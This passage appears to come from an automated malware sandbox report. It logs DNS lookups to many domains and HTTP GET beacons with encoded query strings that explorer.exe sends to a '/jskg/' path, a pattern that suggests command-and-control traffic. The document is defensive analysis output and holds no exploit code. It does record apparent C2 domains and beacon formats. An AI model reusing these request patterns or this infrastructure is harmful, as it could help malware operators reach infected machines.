Nov 21, 2023 03:30:53.771246910 CET	192.168.2.5	1.1.1.1	0x16c9	Standard query (0)	www.bootyfashions.com	A (IP address)	IN (0x0001)	false
Nov 21, 2023 03:30:59.989058971 CET	192.168.2.5	1.1.1.1	0x7973	Standard query (0)	www.topazkibblez.com	A (IP address)	IN (0x0001)	false
Nov 21, 2023 03:31:05.129239082 CET	192.168.2.5	1.1.1.1	0xb2d3	Standard query (0)	www.coryfireshop.com	A (IP address)	IN (0x0001)	false
Nov 21, 2023 03:31:06.128673077 CET	192.168.2.5	1.1.1.1	0xb2d3	Standard query (0)	www.coryfireshop.com	A (IP address)	IN (0x0001)	false
Nov 21, 2023 03:31:07.144340038 CET	192.168.2.5	1.1.1.1	0xb2d3	Standard query (0)	www.coryfireshop.com	A (IP address)	IN (0x0001)	false
Nov 21, 2023 03:31:13.270008087 CET	192.168.2.5	1.1.1.1	0x8e9d	Standard query (0)	www.lacroixundkress.com	A (IP address)	IN (0x0001)	false
Nov 21, 2023 03:31:18.864690065 CET	192.168.2.5	1.1.1.1	0xd16b	Standard query (0)	www.saraadamchak.com	A (IP address)	IN (0x0001)	false
Nov 21, 2023 03:31:24.472753048 CET	192.168.2.5	1.1.1.1	0xfbd5	Standard query (0)	www.kvrkl.com	A (IP address)	IN (0x0001)	false
Nov 21, 2023 03:31:29.613903999 CET	192.168.2.5	1.1.1.1	0xce60	Standard query (0)	www.switchtoambitwithmirtha.com	A (IP address)	IN (0x0001)	false
Nov 21, 2023 03:31:39.770761967 CET	192.168.2.5	1.1.1.1	0x8351	Standard query (0)	www.pnorg.net	A (IP address)	IN (0x0001)	false
Nov 21, 2023 03:31:44.910270929 CET	192.168.2.5	1.1.1.1	0x98b	Standard query (0)	www.dog2meeting.com	A (IP address)	IN (0x0001)	false
Nov 21, 2023 03:31:50.050924063 CET	192.168.2.5	1.1.1.1	0x6529	Standard query (0)	www.erotictoybox.com	A (IP address)	IN (0x0001)	false
Nov 21, 2023 03:31:55.457015038 CET	192.168.2.5	1.1.1.1	0xa2e	Standard query (0)	www.revistabrasileiramarketing.info	A (IP address)	IN (0x0001)	false
Nov 21, 2023 03:32:07.488229036 CET	192.168.2.5	1.1.1.1	0x63d5	Standard query (0)	www.wisdomtoothguru.com	A (IP address)	IN (0x0001)	false
Nov 21, 2023 03:32:12.628865004 CET	192.168.2.5	1.1.1.1	0xb3e	Standard query (0)	www.successwithyolandafgreen.com	A (IP address)	IN (0x0001)	false
Nov 21, 2023 03:32:23.988194942 CET	192.168.2.5	1.1.1.1	0xaa3f	Standard query (0)	www.bootyfashions.com	A (IP address)	IN (0x0001)	false
Nov 21, 2023 03:32:29.128865004 CET	192.168.2.5	1.1.1.1	0x3079	Standard query (0)	www.topazkibblez.com	A (IP address)	IN (0x0001)	false
Nov 21, 2023 03:32:34.270065069 CET	192.168.2.5	1.1.1.1	0x98c0	Standard query (0)	www.coryfireshop.com	A (IP address)	IN (0x0001)	false
Nov 21, 2023 03:32:35.286025047 CET	192.168.2.5	1.1.1.1	0x98c0	Standard query (0)	www.coryfireshop.com	A (IP address)	IN (0x0001)	false
Nov 21, 2023 03:32:36.300199986 CET	192.168.2.5	1.1.1.1	0x98c0	Standard query (0)	www.coryfireshop.com	A (IP address)	IN (0x0001)	false
Nov 21, 2023 03:32:53.066355944 CET	192.168.2.5	1.1.1.1	0x58ba	Standard query (0)	www.kvrkl.com	A (IP address)	IN (0x0001)	false
Nov 21, 2023 03:32:58.410080910 CET	192.168.2.5	1.1.1.1	0x7bf1	Standard query (0)	www.switchtoambitwithmirtha.com	A (IP address)	IN (0x0001)	false
Nov 21, 2023 03:33:08.566287994 CET	192.168.2.5	1.1.1.1	0x54d0	Standard query (0)	www.pnorg.net	A (IP address)	IN (0x0001)	false
Nov 21, 2023 03:33:13.707262993 CET	192.168.2.5	1.1.1.1	0xee40	Standard query (0)	www.dog2meeting.com	A (IP address)	IN (0x0001)	false
Nov 21, 2023 03:33:24.191023111 CET	192.168.2.5	1.1.1.1	0x50c0	Standard query (0)	www.revistabrasileiramarketing.info	A (IP address)	IN (0x0001)	false
Nov 21, 2023 03:33:35.098356962 CET	192.168.2.5	1.1.1.1	0xbd63	Standard query (0)	www.wisdomtoothguru.com	A (IP address)	IN (0x0001)	false
Nov 21, 2023 03:33:40.238239050 CET	192.168.2.5	1.1.1.1	0xadfc	Standard query (0)	www.successwithyolandafgreen.com	A (IP address)	IN (0x0001)	false
Nov 21, 2023 03:33:50.597524881 CET	192.168.2.5	1.1.1.1	0xddc2	Standard query (0)	www.bootyfashions.com	A (IP address)	IN (0x0001)	false
Nov 21, 2023 03:33:55.935547113 CET	192.168.2.5	1.1.1.1	0x8ad4	Standard query (0)	www.topazkibblez.com	A (IP address)	IN (0x0001)	false
Nov 21, 2023 03:34:01.129173040 CET	192.168.2.5	1.1.1.1	0xaeac	Standard query (0)	www.coryfireshop.com	A (IP address)	IN (0x0001)	false
Nov 21, 2023 03:34:02.144475937 CET	192.168.2.5	1.1.1.1	0xaeac	Standard query (0)	www.coryfireshop.com	A (IP address)	IN (0x0001)	false
Nov 21, 2023 03:34:03.160154104 CET	192.168.2.5	1.1.1.1	0xaeac	Standard query (0)	www.coryfireshop.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 21, 2023 03:30:26.945291042 CET	1.1.1.1	192.168.2.5	0xd5ca	Name error (3)	www.revistabrasileiramarketing.info	none	none	A (IP address)	IN (0x0001)	false
Nov 21, 2023 03:30:32.157609940 CET	1.1.1.1	192.168.2.5	0xe30c	No error (0)	www.lactationdrink.com	lactationdrink.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 21, 2023 03:30:32.157609940 CET	1.1.1.1	192.168.2.5	0xe30c	No error (0)	lactationdrink.com		167.172.69.40	A (IP address)	IN (0x0001)	false
Nov 21, 2023 03:30:38.169940948 CET	1.1.1.1	192.168.2.5	0x6a35	Name error (3)	www.wisdomtoothguru.com	none	none	A (IP address)	IN (0x0001)	false
Nov 21, 2023 03:30:43.378720045 CET	1.1.1.1	192.168.2.5	0x9d8c	Name error (3)	www.successwithyolandafgreen.com	none	none	A (IP address)	IN (0x0001)	false
Nov 21, 2023 03:30:48.550123930 CET	1.1.1.1	192.168.2.5	0xd460	No error (0)	www.lbarco.com	www163.wixdns.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 21, 2023 03:30:48.550123930 CET	1.1.1.1	192.168.2.5	0xd460	No error (0)	www163.wixdns.net	cdn1.wixdns.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 21, 2023 03:30:48.550123930 CET	1.1.1.1	192.168.2.5	0xd460	No error (0)	cdn1.wixdns.net	td-ccm-neg-87-45.wixdns.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 21, 2023 03:30:48.550123930 CET	1.1.1.1	192.168.2.5	0xd460	No error (0)	td-ccm-neg-87-45.wixdns.net		34.149.87.45	A (IP address)	IN (0x0001)	false
Nov 21, 2023 03:30:53.960808039 CET	1.1.1.1	192.168.2.5	0x16c9	Name error (3)	www.bootyfashions.com	none	none	A (IP address)	IN (0x0001)	false
Nov 21, 2023 03:31:00.118714094 CET	1.1.1.1	192.168.2.5	0x7973	Name error (3)	www.topazkibblez.com	none	none	A (IP address)	IN (0x0001)	false
Nov 21, 2023 03:31:08.266380072 CET	1.1.1.1	192.168.2.5	0xb2d3	Server failure (2)	www.coryfireshop.com	none	none	A (IP address)	IN (0x0001)	false
Nov 21, 2023 03:31:08.266397953 CET	1.1.1.1	192.168.2.5	0xb2d3	Server failure (2)	www.coryfireshop.com	none	none	A (IP address)	IN (0x0001)	false
Nov 21, 2023 03:31:08.266410112 CET	1.1.1.1	192.168.2.5	0xb2d3	Server failure (2)	www.coryfireshop.com	none	none	A (IP address)	IN (0x0001)	false
Nov 21, 2023 03:31:13.452677965 CET	1.1.1.1	192.168.2.5	0x8e9d	No error (0)	www.lacroixundkress.com		217.160.0.167	A (IP address)	IN (0x0001)	false
Nov 21, 2023 03:31:19.176352024 CET	1.1.1.1	192.168.2.5	0xd16b	No error (0)	www.saraadamchak.com	shops.myshopify.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 21, 2023 03:31:19.176352024 CET	1.1.1.1	192.168.2.5	0xd16b	No error (0)	shops.myshopify.com		23.227.38.74	A (IP address)	IN (0x0001)	false
Nov 21, 2023 03:31:24.601448059 CET	1.1.1.1	192.168.2.5	0xfbd5	Name error (3)	www.kvrkl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 21, 2023 03:31:29.742202044 CET	1.1.1.1	192.168.2.5	0xce60	Name error (3)	www.switchtoambitwithmirtha.com	none	none	A (IP address)	IN (0x0001)	false
Nov 21, 2023 03:31:39.900440931 CET	1.1.1.1	192.168.2.5	0x8351	Name error (3)	www.pnorg.net	none	none	A (IP address)	IN (0x0001)	false
Nov 21, 2023 03:31:45.039093971 CET	1.1.1.1	192.168.2.5	0x98b	Name error (3)	www.dog2meeting.com	none	none	A (IP address)	IN (0x0001)	false
Nov 21, 2023 03:31:50.183708906 CET	1.1.1.1	192.168.2.5	0x6529	No error (0)	www.erotictoybox.com	erotictoybox-com.myshopify.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 21, 2023 03:31:50.183708906 CET	1.1.1.1	192.168.2.5	0x6529	No error (0)	erotictoybox-com.myshopify.com	shops.myshopify.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 21, 2023 03:31:50.183708906 CET	1.1.1.1	192.168.2.5	0x6529	No error (0)	shops.myshopify.com		23.227.38.74	A (IP address)	IN (0x0001)	false
Nov 21, 2023 03:31:55.758850098 CET	1.1.1.1	192.168.2.5	0xa2e	Name error (3)	www.revistabrasileiramarketing.info	none	none	A (IP address)	IN (0x0001)	false
Nov 21, 2023 03:32:07.616873026 CET	1.1.1.1	192.168.2.5	0x63d5	Name error (3)	www.wisdomtoothguru.com	none	none	A (IP address)	IN (0x0001)	false
Nov 21, 2023 03:32:12.756762981 CET	1.1.1.1	192.168.2.5	0xb3e	Name error (3)	www.successwithyolandafgreen.com	none	none	A (IP address)	IN (0x0001)	false
Nov 21, 2023 03:32:24.116934061 CET	1.1.1.1	192.168.2.5	0xaa3f	Name error (3)	www.bootyfashions.com	none	none	A (IP address)	IN (0x0001)	false
Nov 21, 2023 03:32:29.258497953 CET	1.1.1.1	192.168.2.5	0x3079	Name error (3)	www.topazkibblez.com	none	none	A (IP address)	IN (0x0001)	false
Nov 21, 2023 03:32:37.406968117 CET	1.1.1.1	192.168.2.5	0x98c0	Server failure (2)	www.coryfireshop.com	none	none	A (IP address)	IN (0x0001)	false
Nov 21, 2023 03:32:37.406986952 CET	1.1.1.1	192.168.2.5	0x98c0	Server failure (2)	www.coryfireshop.com	none	none	A (IP address)	IN (0x0001)	false
Nov 21, 2023 03:32:37.406996965 CET	1.1.1.1	192.168.2.5	0x98c0	Server failure (2)	www.coryfireshop.com	none	none	A (IP address)	IN (0x0001)	false
Nov 21, 2023 03:32:53.397983074 CET	1.1.1.1	192.168.2.5	0x58ba	Name error (3)	www.kvrkl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 21, 2023 03:32:58.538961887 CET	1.1.1.1	192.168.2.5	0x7bf1	Name error (3)	www.switchtoambitwithmirtha.com	none	none	A (IP address)	IN (0x0001)	false
Nov 21, 2023 03:33:08.694789886 CET	1.1.1.1	192.168.2.5	0x54d0	Name error (3)	www.pnorg.net	none	none	A (IP address)	IN (0x0001)	false
Nov 21, 2023 03:33:13.908140898 CET	1.1.1.1	192.168.2.5	0xee40	Name error (3)	www.dog2meeting.com	none	none	A (IP address)	IN (0x0001)	false
Nov 21, 2023 03:33:24.378483057 CET	1.1.1.1	192.168.2.5	0x50c0	Name error (3)	www.revistabrasileiramarketing.info	none	none	A (IP address)	IN (0x0001)	false
Nov 21, 2023 03:33:35.227684021 CET	1.1.1.1	192.168.2.5	0xbd63	Name error (3)	www.wisdomtoothguru.com	none	none	A (IP address)	IN (0x0001)	false
Nov 21, 2023 03:33:40.367223024 CET	1.1.1.1	192.168.2.5	0xadfc	Name error (3)	www.successwithyolandafgreen.com	none	none	A (IP address)	IN (0x0001)	false
Nov 21, 2023 03:33:50.726401091 CET	1.1.1.1	192.168.2.5	0xddc2	Name error (3)	www.bootyfashions.com	none	none	A (IP address)	IN (0x0001)	false
Nov 21, 2023 03:33:56.125416040 CET	1.1.1.1	192.168.2.5	0x8ad4	Name error (3)	www.topazkibblez.com	none	none	A (IP address)	IN (0x0001)	false
Nov 21, 2023 03:34:03.764373064 CET	1.1.1.1	192.168.2.5	0xaeac	Server failure (2)	www.coryfireshop.com	none	none	A (IP address)	IN (0x0001)	false
Nov 21, 2023 03:34:03.764391899 CET	1.1.1.1	192.168.2.5	0xaeac	Server failure (2)	www.coryfireshop.com	none	none	A (IP address)	IN (0x0001)	false
Nov 21, 2023 03:34:03.764404058 CET	1.1.1.1	192.168.2.5	0xaeac	Server failure (2)	www.coryfireshop.com	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.lactationdrink.com

www.lbarco.com

www.lacroixundkress.com

www.saraadamchak.com

www.erotictoybox.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	167.172.69.40	80	192.168.2.5	49712	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 03:30:32.559422016 CET	137	OUT	GET /jskg/?yV3lvHf=VpJkz2P0T+/fMnrM7Dd1ATiiN68XLLnGpPbE/bn1fGrx+Ecv7ydvnShawUNCssxxEBuD&8pbLu=d8z4X8O0M HTTP/1.1 Host: www.lactationdrink.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 21, 2023 03:30:32.959043980 CET	138	IN	HTTP/1.1 404 Not Found content-type: text/html cache-control: private, no-cache, max-age=0 pragma: no-cache content-length: 1236 date: Tue, 21 Nov 2023 02:30:32 GMT server: LiteSpeed connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 20 3c 61 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 66 66 3b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;" href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Pleas
Nov 21, 2023 03:30:32.959058046 CET	139	IN	Data Raw: 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 Data Ascii: e be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49712	167.172.69.40	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 03:30:32.559422016 CET	137	OUT	GET /jskg/?yV3lvHf=VpJkz2P0T+/fMnrM7Dd1ATiiN68XLLnGpPbE/bn1fGrx+Ecv7ydvnShawUNCssxxEBuD&8pbLu=d8z4X8O0M HTTP/1.1 Host: www.lactationdrink.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 21, 2023 03:30:32.959043980 CET	138	IN	HTTP/1.1 404 Not Found content-type: text/html cache-control: private, no-cache, max-age=0 pragma: no-cache content-length: 1236 date: Tue, 21 Nov 2023 02:30:32 GMT server: LiteSpeed connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 20 3c 61 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 66 66 3b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;" href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Pleas
Nov 21, 2023 03:30:32.959058046 CET	139	IN	Data Raw: 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 Data Ascii: e be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	34.149.87.45	80	192.168.2.5	49713	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 03:30:48.646835089 CET	142	OUT	GET /jskg/?yV3lvHf=sl42yIbVTE2EkcOIsEKOUlHCBbE7QxdA6NZ7PagwYH4YR2l/R8Pf4e2TsXHmMhsmvqG9&8pbLu=d8z4X8O0M HTTP/1.1 Host: www.lbarco.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 21, 2023 03:30:48.754308939 CET	142	IN	HTTP/1.1 429 Too Many Requests Content-Length: 0 Accept-Ranges: bytes Date: Tue, 21 Nov 2023 02:30:48 GMT X-Served-By: cache-iad-kjyo7100157-IAD X-Cache: MISS X-Seen-By: yvSunuo/8ld62ehjr5B7kA== Via: 1.1 google Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.5	49713	34.149.87.45	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 03:30:48.646835089 CET	142	OUT	GET /jskg/?yV3lvHf=sl42yIbVTE2EkcOIsEKOUlHCBbE7QxdA6NZ7PagwYH4YR2l/R8Pf4e2TsXHmMhsmvqG9&8pbLu=d8z4X8O0M HTTP/1.1 Host: www.lbarco.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 21, 2023 03:30:48.754308939 CET	142	IN	HTTP/1.1 429 Too Many Requests Content-Length: 0 Accept-Ranges: bytes Date: Tue, 21 Nov 2023 02:30:48 GMT X-Served-By: cache-iad-kjyo7100157-IAD X-Cache: MISS X-Seen-By: yvSunuo/8ld62ehjr5B7kA== Via: 1.1 google Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	167.172.69.40	80	192.168.2.5	49724	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
